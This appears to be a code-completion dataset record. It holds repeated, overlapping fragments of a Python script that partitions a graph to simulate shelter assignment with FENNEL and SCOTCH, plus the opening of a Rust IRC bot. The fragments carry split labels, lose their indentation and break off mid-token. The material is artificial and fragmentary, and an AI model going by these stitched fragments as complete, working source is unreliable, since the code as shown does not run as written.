x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
continue
batch_arrived.append(a)
# NOTE: TEMPORARY -> enable graph_modification_functions
graph_modification_functions = False
if restream_batches == len(batch_arrived) or i == len(arrival_order) - 1:
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# set node weight to prediction generated from a GAM
if alter_node_weight_to_gam_prediction:
total_arrived = nodes_arrived + batch_arrived + [a]
if len(total_arrived) < gam_k_value:
k = len(total_arrived)
else:
k = gam_k_value
gam_weights = shared.gam_predict(POPULATION_LOCATION_FILE, len(total_arrived), k)
for node in G.nodes_iter():
if alter_arrived_node_weight_to_100 and node in total_arrived:
pass # weight would have been set previously
else:
G.node[node]['weight'] = int(gam_weights[node] * 100)
G = edge_expansion(G)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived + batch_arrived)
# recalculate alpha
if Gsub.is_directed():
# as it's a directed graph, edges_arrived is actually double, so divide by 2
edges_arrived = Gsub.number_of_edges() / 2
else:
edges_arrived = Gsub.number_of_edges()
nodes_fixed = len([o for o in fixed if o == 1])
alpha = (edges_arrived) * (num_partitions / (nodes_fixed + len(batch_arrived))**2)
if alter_node_weight_to_gam_prediction:
# justification: the gam learns the entire population, so run fennal on entire population
assignments = fennel.generate_prediction_model(G,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
else:
# use the information we have, those that arrived
assignments = fennel.generate_prediction_model(Gsub,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
# assign nodes to prediction model
for n in batch_arrived:
fixed[n] = 1
nodes_arrived.append(n)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
batch_arrived = []
# remove nodes not fixed
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 5 ********** # | random_line_split | |
_debug_alg.py | import os
import shared
import networkx as nx
import numpy as np
import pyximport; pyximport.install()
import fennel
# ******** SECTION 1 ************* #
try:
import config
except ImportError as err:
print(err)
print("**Could not load config.py\n**Copy config_template.py and rename it.")
pwd = os.getcwd()
DATA_FILENAME = os.path.join(pwd, "data", "oneshot_fennel_weights.txt")
OUTPUT_DIRECTORY = os.path.join(pwd, "output")
# Read input file for prediction model, if not provided a prediction
# model is made using FENNEL
PREDICTION_MODEL = ""
# File containing simulated arrivals. This is used in simulating nodes
# arriving at the shelter. Nodes represented by line number; value of
# 1 represents a node as arrived; value of 0 represents the node as not
# arrived or needing a shelter.
SIMULATED_ARRIVAL_FILE = os.path.join(pwd, "data", "simulated_arrival.txt")
#SIMULATED_ARRIVAL_FILE = ""
# File containing the geographic location of each node.
POPULATION_LOCATION_FILE = os.path.join(pwd, "data", "population_location.csv")
# Number of shelters
num_partitions = 4
# The number of iterations when making prediction model
num_iterations = 10
# Percentage of prediction model to use before discarding
# When set to 0, prediction model is discarded, useful for one-shot
prediction_model_cut_off = 0.10
# Alpha value used in one-shot (when restream_batches set to 1)
one_shot_alpha = 0.5
# Number of arrivals to batch before recalculating alpha and restreaming.
# When set to 1, one-shot is used with alpha value from above
restream_batches = 10
# Create virtual nodes based on prediction model
use_virtual_nodes = False
# Virtual nodes: edge weight
virtual_edge_weight = 1.0
####
# GRAPH MODIFICATION FUNCTIONS
# Also enables the edge calculation function.
graph_modification_functions = True
# If set, the node weight is set to 100 if the node arrives at the shelter,
# otherwise the node is removed from the graph.
alter_arrived_node_weight_to_100 = True
# Uses generalized additive models from R to generate prediction of nodes not
# arrived. This sets the node weight on unarrived nodes the the prediction
# given by a GAM.
# Needs POPULATION_LOCATION_FILE to be set.
alter_node_weight_to_gam_prediction = True
gam_k_value = 100
# Alter the edge weight for nodes that haven't arrived. This is a way to
# de-emphasise the prediction model for the unknown nodes.
prediction_model_emphasis = 1.0
# read METIS file
G = shared.read_metis(DATA_FILENAME)
# Alpha value used in prediction model
prediction_model_alpha = G.number_of_edges() * (num_partitions / G.number_of_nodes()**2)
# Order of nodes arriving
arrival_order = list(range(0, G.number_of_nodes()))
# Arrival order should not be shuffled if using GAM to alter node weights
#random.shuffle(arrival_order)
if SIMULATED_ARRIVAL_FILE == "":
# mark all nodes as needing a shelter
simulated_arrival_list = [1]*G.number_of_nodes()
else:
with open(SIMULATED_ARRIVAL_FILE, "r") as ar:
simulated_arrival_list = [int(line.rstrip('\n')) for line in ar]
print("Graph loaded...")
print("Nodes: {}".format(G.number_of_nodes()))
print("Edges: {}".format(G.number_of_edges()))
if nx.is_directed(G):
print("Graph is directed")
else:
print("Graph is undirected")
# ******** END SECTION 1 ********** #
# ******** SECTION 2 **************#
# setup for other algorithms
if config.ENABLE_SCOTCH == True:
# import the relevant SCOTCH modules
from scotch.graph_mapper import GraphMapper
from scotch.io import ScotchGraphArrays
UNMAPPED = -1
# reset
assignments = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fixed = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
print("PREDICTION MODEL")
print("----------------")
# Display which algorithm is being run
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
print("Using: FENNEL Partitioning")
print("---------------\n")
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
print("Using: SCOTCH Partitioning")
print("--------------------------\n")
predictionModels = {}
# store model data for different types of partitioners
# NOTE: THIS IS NOT IMPLEMENTED YET - need to discuss first
if config.RUN_ALL_PREDICTION_MODEL_ALGORITHMS == True:
# create different prediction models
fennelModel = {}
fennelModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fennelModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.FENNEL] = fennelModel
scotchModel = {}
scotchModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
scotchModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.SCOTCH] = scotchModel
# Begin computation of prediction model
if PREDICTION_MODEL:
# if we have a prediction model from file, load it
with open(PREDICTION_MODEL, "r") as inf:
assignments = np.fromiter(inf.readlines(), dtype=np.int32)
else:
# choose the right algorithm
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
assignments = fennel.generate_prediction_model(G, num_iterations, num_partitions, assignments, fixed, prediction_model_alpha)
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# SCOTCH algorithm
# we have a networkx graph already, G
scotchArrays = ScotchGraphArrays() # create the object storing all the SCOTCH arrays
scotchArrays.fromNetworkxGraph(G, baseval=0) # populate arrays from G
#scotchArrays.debugPrint() # uncomment this to print out contents of scotchArrays
# create instance of SCOTCH Library
mapper = GraphMapper(config.SCOTCH_LIB_PATH)
# set some optional parameters for the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph
# see csap-graphpartitioning/src/python/scotch/graph_mapper: GraphMapper.__init__() method for more options
mapper.kbalval = 0.1
mapper.numPartitions = num_partitions
# intializes the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph using scotchArray and optional parameters
ok = mapper.initialize(scotchArrays, verbose=False)
if(ok):
# we can proceed with graphMap, the data structures were setup correctly
ok = mapper.graphMap()
if(ok):
# graphMap was run successfully, copy the assignments
# make a deep copy as we then delete the mapper data, to clear memory
# and the array reference may be lost
assignments = np.array(mapper.scotchData._parttab, copy=True)
mapper.delObjects()
else:
print('Error while running graphMap()')
else:
print('Error while setting up SCOTCH for partitioning.')
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 2 ********** #
# ******** START SECTION 3 ********** #
if use_virtual_nodes:
print("Creating virtual nodes and assigning edges based on prediction model")
# create virtual nodes
virtual_nodes = list(range(G.number_of_nodes(), G.number_of_nodes() + num_partitions))
print("\nVirtual nodes:")
# create virtual edges
virtual_edges = []
for n in range(0, G.number_of_nodes()):
virtual_edges += [(n, virtual_nodes[assignments[n]])]
# extend assignments
assignments = np.append(assignments, np.array(list(range(0, num_partitions)), dtype=np.int32))
fixed = np.append(fixed, np.array([1] * num_partitions, dtype=np.int32))
G.add_nodes_from(virtual_nodes, weight=1)
G.add_edges_from(virtual_edges, weight=virtual_edge_weight)
print("\nAssignments:")
shared.fixed_width_print(assignments)
print("Last {} nodes are virtual nodes.".format(num_partitions))
# ******** END SECTION 3 ********** #
# ******** START SECTION 4 ********** #
cut_off_value = int(prediction_model_cut_off * G.number_of_nodes())
if prediction_model_cut_off == 0:
print("Discarding prediction model\n")
else:
print("Assign first {} arrivals using prediction model, then discard\n".format(cut_off_value))
# fix arrivals
nodes_arrived = []
for a in arrival_order:
# check if node needs a shelter
if simulated_arrival_list[a] == 0:
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
G.node[a]['weight'] = 100
nodes_fixed = len([o for o in fixed if o == 1])
if nodes_fixed >= cut_off_value:
break
fixed[a] = 1
nodes_arrived.append(a)
# remove nodes not fixed, ie. discard prediction model
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 4 ********** #
# ******** START SECTION 5 ********** #
if restream_batches == 1:
print("One-shot assignment mode")
print("------------------------\n")
else:
|
def edge_expansion(G):
# Update edge weights for nodes that have an assigned probability of displacement
for edge in G.edges_iter(data=True):
left = edge[0]
right = edge[1]
edge_weight = edge[2]['weight_orig']
# new edge weight
edge[2]['weight'] = (float(G.node[left]['weight']) * edge_weight) * (float(G.node[right]['weight']) * edge_weight)
if left in nodes_arrived or right in nodes_arrived:
# change the emphasis of the prediction model
edge[2]['weight'] = edge[2]['weight'] * prediction_model_emphasis
return G
# preserve original node/edge weight
if graph_modification_functions:
node_weights = {n[0]: n[1]['weight'] for n in G.nodes_iter(data=True)}
nx.set_node_attributes(G, 'weight_orig', node_weights)
edge_weights = {(e[0], e[1]): e[2]['weight'] for e in G.edges_iter(data=True)}
nx.set_edge_attributes(G, 'weight_orig', edge_weights)
# SETUP SCOTCH VARIABLES
scotchMapper = None
scotchArrayData = None
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
scotchMapper = GraphMapper(config.SCOTCH_LIB_PATH, numPartitions=num_partitions)
scotchArrayData = ScotchGraphArrays()
# FOR DEBUGGING PURPOSES:
print('Graph mod fncs:',graph_modification_functions)
print('restream_batches:', restream_batches)
batch_arrived = []
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME\tALPHA")
for i, a in enumerate(arrival_order):
# check if node is already arrived
if fixed[a] == 1:
continue
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# remove nodes that don't need a shelter
if simulated_arrival_list[a] == 0:
print('Removing Node', a)
G.remove_node(a)
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
print("Setting weight=100 on node", a)
G.node[a]['weight'] = 100
# one-shot assigment: assign each node as it arrives
if restream_batches == 1:
alpha = one_shot_alpha
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.FENNEL:
partition_votes = fennel.get_votes(G, a, num_partitions, assignments)
assignments[a] = fennel.get_assignment(G, a, num_partitions, assignments, partition_votes, alpha, 0)
elif config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# load array data from graph
scotchArrayData.fromNetworkxGraph(G, parttab=assignments)
ok = scotchMapper.initialize(scotchArrayData)
if(ok):
# mapper initialized
ok = scotchMapper.graphMapFixed()
if(ok):
assignments = scotchMapper.scotchData._parttab
else:
print("Error running graphMapFixed()")
else:
print("Error initializing SCOTCH GraphMapper for graphMapFixed()")
fixed[a] = 1
nodes_arrived.append(a)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
continue
batch_arrived.append(a)
# NOTE: TEMPORARY -> enable graph_modification_functions
graph_modification_functions = False
if restream_batches == len(batch_arrived) or i == len(arrival_order) - 1:
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# set node weight to prediction generated from a GAM
if alter_node_weight_to_gam_prediction:
total_arrived = nodes_arrived + batch_arrived + [a]
if len(total_arrived) < gam_k_value:
k = len(total_arrived)
else:
k = gam_k_value
gam_weights = shared.gam_predict(POPULATION_LOCATION_FILE, len(total_arrived), k)
for node in G.nodes_iter():
if alter_arrived_node_weight_to_100 and node in total_arrived:
pass # weight would have been set previously
else:
G.node[node]['weight'] = int(gam_weights[node] * 100)
G = edge_expansion(G)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived + batch_arrived)
# recalculate alpha
if Gsub.is_directed():
# as it's a directed graph, edges_arrived is actually double, so divide by 2
edges_arrived = Gsub.number_of_edges() / 2
else:
edges_arrived = Gsub.number_of_edges()
nodes_fixed = len([o for o in fixed if o == 1])
alpha = (edges_arrived) * (num_partitions / (nodes_fixed + len(batch_arrived))**2)
if alter_node_weight_to_gam_prediction:
# justification: the gam learns the entire population, so run fennal on entire population
assignments = fennel.generate_prediction_model(G,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
else:
# use the information we have, those that arrived
assignments = fennel.generate_prediction_model(Gsub,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
# assign nodes to prediction model
for n in batch_arrived:
fixed[n] = 1
nodes_arrived.append(n)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
batch_arrived = []
# remove nodes not fixed
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 5 ********** #
| print("Assigning in batches of {}".format(restream_batches))
print("--------------------------------\n") | conditional_block |
_debug_alg.py | import os
import shared
import networkx as nx
import numpy as np
import pyximport; pyximport.install()
import fennel
# ******** SECTION 1 ************* #
try:
import config
except ImportError as err:
print(err)
print("**Could not load config.py\n**Copy config_template.py and rename it.")
pwd = os.getcwd()
DATA_FILENAME = os.path.join(pwd, "data", "oneshot_fennel_weights.txt")
OUTPUT_DIRECTORY = os.path.join(pwd, "output")
# Read input file for prediction model, if not provided a prediction
# model is made using FENNEL
PREDICTION_MODEL = ""
# File containing simulated arrivals. This is used in simulating nodes
# arriving at the shelter. Nodes represented by line number; value of
# 1 represents a node as arrived; value of 0 represents the node as not
# arrived or needing a shelter.
SIMULATED_ARRIVAL_FILE = os.path.join(pwd, "data", "simulated_arrival.txt")
#SIMULATED_ARRIVAL_FILE = ""
# File containing the geographic location of each node.
POPULATION_LOCATION_FILE = os.path.join(pwd, "data", "population_location.csv")
# Number of shelters
num_partitions = 4
# The number of iterations when making prediction model
num_iterations = 10
# Percentage of prediction model to use before discarding
# When set to 0, prediction model is discarded, useful for one-shot
prediction_model_cut_off = 0.10
# Alpha value used in one-shot (when restream_batches set to 1)
one_shot_alpha = 0.5
# Number of arrivals to batch before recalculating alpha and restreaming.
# When set to 1, one-shot is used with alpha value from above
restream_batches = 10
# Create virtual nodes based on prediction model
use_virtual_nodes = False
# Virtual nodes: edge weight
virtual_edge_weight = 1.0
####
# GRAPH MODIFICATION FUNCTIONS
# Also enables the edge calculation function.
graph_modification_functions = True
# If set, the node weight is set to 100 if the node arrives at the shelter,
# otherwise the node is removed from the graph.
alter_arrived_node_weight_to_100 = True
# Uses generalized additive models from R to generate prediction of nodes not
# arrived. This sets the node weight on unarrived nodes the the prediction
# given by a GAM.
# Needs POPULATION_LOCATION_FILE to be set.
alter_node_weight_to_gam_prediction = True
gam_k_value = 100
# Alter the edge weight for nodes that haven't arrived. This is a way to
# de-emphasise the prediction model for the unknown nodes.
prediction_model_emphasis = 1.0
# read METIS file
G = shared.read_metis(DATA_FILENAME)
# Alpha value used in prediction model
prediction_model_alpha = G.number_of_edges() * (num_partitions / G.number_of_nodes()**2)
# Order of nodes arriving
arrival_order = list(range(0, G.number_of_nodes()))
# Arrival order should not be shuffled if using GAM to alter node weights
#random.shuffle(arrival_order)
if SIMULATED_ARRIVAL_FILE == "":
# mark all nodes as needing a shelter
simulated_arrival_list = [1]*G.number_of_nodes()
else:
with open(SIMULATED_ARRIVAL_FILE, "r") as ar:
simulated_arrival_list = [int(line.rstrip('\n')) for line in ar]
print("Graph loaded...")
print("Nodes: {}".format(G.number_of_nodes()))
print("Edges: {}".format(G.number_of_edges()))
if nx.is_directed(G):
print("Graph is directed")
else:
print("Graph is undirected")
# ******** END SECTION 1 ********** #
# ******** SECTION 2 **************#
# setup for other algorithms
if config.ENABLE_SCOTCH == True:
# import the relevant SCOTCH modules
from scotch.graph_mapper import GraphMapper
from scotch.io import ScotchGraphArrays
UNMAPPED = -1
# reset
assignments = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fixed = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
print("PREDICTION MODEL")
print("----------------")
# Display which algorithm is being run
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
print("Using: FENNEL Partitioning")
print("---------------\n")
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
print("Using: SCOTCH Partitioning")
print("--------------------------\n")
predictionModels = {}
# store model data for different types of partitioners
# NOTE: THIS IS NOT IMPLEMENTED YET - need to discuss first
if config.RUN_ALL_PREDICTION_MODEL_ALGORITHMS == True:
# create different prediction models
fennelModel = {}
fennelModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fennelModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.FENNEL] = fennelModel
scotchModel = {}
scotchModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
scotchModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.SCOTCH] = scotchModel
# Begin computation of prediction model
if PREDICTION_MODEL:
# if we have a prediction model from file, load it
with open(PREDICTION_MODEL, "r") as inf:
assignments = np.fromiter(inf.readlines(), dtype=np.int32)
else:
# choose the right algorithm
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
assignments = fennel.generate_prediction_model(G, num_iterations, num_partitions, assignments, fixed, prediction_model_alpha)
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# SCOTCH algorithm
# we have a networkx graph already, G
scotchArrays = ScotchGraphArrays() # create the object storing all the SCOTCH arrays
scotchArrays.fromNetworkxGraph(G, baseval=0) # populate arrays from G
#scotchArrays.debugPrint() # uncomment this to print out contents of scotchArrays
# create instance of SCOTCH Library
mapper = GraphMapper(config.SCOTCH_LIB_PATH)
# set some optional parameters for the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph
# see csap-graphpartitioning/src/python/scotch/graph_mapper: GraphMapper.__init__() method for more options
mapper.kbalval = 0.1
mapper.numPartitions = num_partitions
# intializes the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph using scotchArray and optional parameters
ok = mapper.initialize(scotchArrays, verbose=False)
if(ok):
# we can proceed with graphMap, the data structures were setup correctly
ok = mapper.graphMap()
if(ok):
# graphMap was run successfully, copy the assignments
# make a deep copy as we then delete the mapper data, to clear memory
# and the array reference may be lost
assignments = np.array(mapper.scotchData._parttab, copy=True)
mapper.delObjects()
else:
print('Error while running graphMap()')
else:
print('Error while setting up SCOTCH for partitioning.')
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 2 ********** #
# ******** START SECTION 3 ********** #
if use_virtual_nodes:
print("Creating virtual nodes and assigning edges based on prediction model")
# create virtual nodes
virtual_nodes = list(range(G.number_of_nodes(), G.number_of_nodes() + num_partitions))
print("\nVirtual nodes:")
# create virtual edges
virtual_edges = []
for n in range(0, G.number_of_nodes()):
virtual_edges += [(n, virtual_nodes[assignments[n]])]
# extend assignments
assignments = np.append(assignments, np.array(list(range(0, num_partitions)), dtype=np.int32))
fixed = np.append(fixed, np.array([1] * num_partitions, dtype=np.int32))
G.add_nodes_from(virtual_nodes, weight=1)
G.add_edges_from(virtual_edges, weight=virtual_edge_weight)
print("\nAssignments:")
shared.fixed_width_print(assignments)
print("Last {} nodes are virtual nodes.".format(num_partitions))
# ******** END SECTION 3 ********** #
# ******** START SECTION 4 ********** #
cut_off_value = int(prediction_model_cut_off * G.number_of_nodes())
if prediction_model_cut_off == 0:
print("Discarding prediction model\n")
else:
print("Assign first {} arrivals using prediction model, then discard\n".format(cut_off_value))
# fix arrivals
nodes_arrived = []
for a in arrival_order:
# check if node needs a shelter
if simulated_arrival_list[a] == 0:
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
G.node[a]['weight'] = 100
nodes_fixed = len([o for o in fixed if o == 1])
if nodes_fixed >= cut_off_value:
break
fixed[a] = 1
nodes_arrived.append(a)
# remove nodes not fixed, ie. discard prediction model
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 4 ********** #
# ******** START SECTION 5 ********** #
if restream_batches == 1:
print("One-shot assignment mode")
print("------------------------\n")
else:
print("Assigning in batches of {}".format(restream_batches))
print("--------------------------------\n")
def | (G):
# Update edge weights for nodes that have an assigned probability of displacement
for edge in G.edges_iter(data=True):
left = edge[0]
right = edge[1]
edge_weight = edge[2]['weight_orig']
# new edge weight
edge[2]['weight'] = (float(G.node[left]['weight']) * edge_weight) * (float(G.node[right]['weight']) * edge_weight)
if left in nodes_arrived or right in nodes_arrived:
# change the emphasis of the prediction model
edge[2]['weight'] = edge[2]['weight'] * prediction_model_emphasis
return G
# preserve original node/edge weight
if graph_modification_functions:
node_weights = {n[0]: n[1]['weight'] for n in G.nodes_iter(data=True)}
nx.set_node_attributes(G, 'weight_orig', node_weights)
edge_weights = {(e[0], e[1]): e[2]['weight'] for e in G.edges_iter(data=True)}
nx.set_edge_attributes(G, 'weight_orig', edge_weights)
# SETUP SCOTCH VARIABLES
scotchMapper = None
scotchArrayData = None
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
scotchMapper = GraphMapper(config.SCOTCH_LIB_PATH, numPartitions=num_partitions)
scotchArrayData = ScotchGraphArrays()
# FOR DEBUGGING PURPOSES:
print('Graph mod fncs:',graph_modification_functions)
print('restream_batches:', restream_batches)
batch_arrived = []
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME\tALPHA")
for i, a in enumerate(arrival_order):
# check if node is already arrived
if fixed[a] == 1:
continue
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# remove nodes that don't need a shelter
if simulated_arrival_list[a] == 0:
print('Removing Node', a)
G.remove_node(a)
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
print("Setting weight=100 on node", a)
G.node[a]['weight'] = 100
# one-shot assigment: assign each node as it arrives
if restream_batches == 1:
alpha = one_shot_alpha
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.FENNEL:
partition_votes = fennel.get_votes(G, a, num_partitions, assignments)
assignments[a] = fennel.get_assignment(G, a, num_partitions, assignments, partition_votes, alpha, 0)
elif config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# load array data from graph
scotchArrayData.fromNetworkxGraph(G, parttab=assignments)
ok = scotchMapper.initialize(scotchArrayData)
if(ok):
# mapper initialized
ok = scotchMapper.graphMapFixed()
if(ok):
assignments = scotchMapper.scotchData._parttab
else:
print("Error running graphMapFixed()")
else:
print("Error initializing SCOTCH GraphMapper for graphMapFixed()")
fixed[a] = 1
nodes_arrived.append(a)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
continue
batch_arrived.append(a)
# NOTE: TEMPORARY -> enable graph_modification_functions
graph_modification_functions = False
if restream_batches == len(batch_arrived) or i == len(arrival_order) - 1:
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# set node weight to prediction generated from a GAM
if alter_node_weight_to_gam_prediction:
total_arrived = nodes_arrived + batch_arrived + [a]
if len(total_arrived) < gam_k_value:
k = len(total_arrived)
else:
k = gam_k_value
gam_weights = shared.gam_predict(POPULATION_LOCATION_FILE, len(total_arrived), k)
for node in G.nodes_iter():
if alter_arrived_node_weight_to_100 and node in total_arrived:
pass # weight would have been set previously
else:
G.node[node]['weight'] = int(gam_weights[node] * 100)
G = edge_expansion(G)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived + batch_arrived)
# recalculate alpha
if Gsub.is_directed():
# as it's a directed graph, edges_arrived is actually double, so divide by 2
edges_arrived = Gsub.number_of_edges() / 2
else:
edges_arrived = Gsub.number_of_edges()
nodes_fixed = len([o for o in fixed if o == 1])
alpha = (edges_arrived) * (num_partitions / (nodes_fixed + len(batch_arrived))**2)
if alter_node_weight_to_gam_prediction:
# justification: the gam learns the entire population, so run fennal on entire population
assignments = fennel.generate_prediction_model(G,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
else:
# use the information we have, those that arrived
assignments = fennel.generate_prediction_model(Gsub,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
# assign nodes to prediction model
for n in batch_arrived:
fixed[n] = 1
nodes_arrived.append(n)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
batch_arrived = []
# remove nodes not fixed
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 5 ********** #
| edge_expansion | identifier_name |
main.rs | use alis_bot_rs::*;
use clap::{App, Arg, ArgMatches};
use failure::Error;
use futures::prelude::*;
use glob::glob;
use irc::client::prelude::*;
use log::{debug, error, info};
use std::path::PathBuf;
use std::sync::mpsc::channel;
use std::sync::{Arc, Condvar, Mutex};
use std::thread;
use tokio::runtime::Runtime;
#[macro_use]
extern crate failure;
const CONFIG_FILE_OPT: &str = "config";
const CONFIG_DIR_OPT: &str = "conf-dir";
const CONFIG_FILE_EXT: &str = "toml";
const DEFAULT_CONFIG_FILE: &str = "example_config.toml";
fn build_app() -> App<'static> {
App::new("alis-bot-rs")
.version("1.0")
.about("alis-unofficial IRC bot")
.arg(
Arg::new("config")
.about("configuration file(s) to use")
.takes_value(true)
.short('c')
.long("config")
.value_name("FILE")
.multiple(true)
.conflicts_with("conf-dir"),
)
.arg("-d, --conf-dir=[DIR] 'configuration directory to use'")
}
fn main() {
let matches = build_app().get_matches();
env_logger::init();
let configs = match get_config_paths_from_cli(matches) {
Ok(c) => c,
Err(e) => {
error!("{}", e);
match get_config_path_from_default() {
Ok(c) => c,
Err(e) => {
error!("{}", e);
return;
}
}
}
};
let rt = Runtime::new().unwrap();
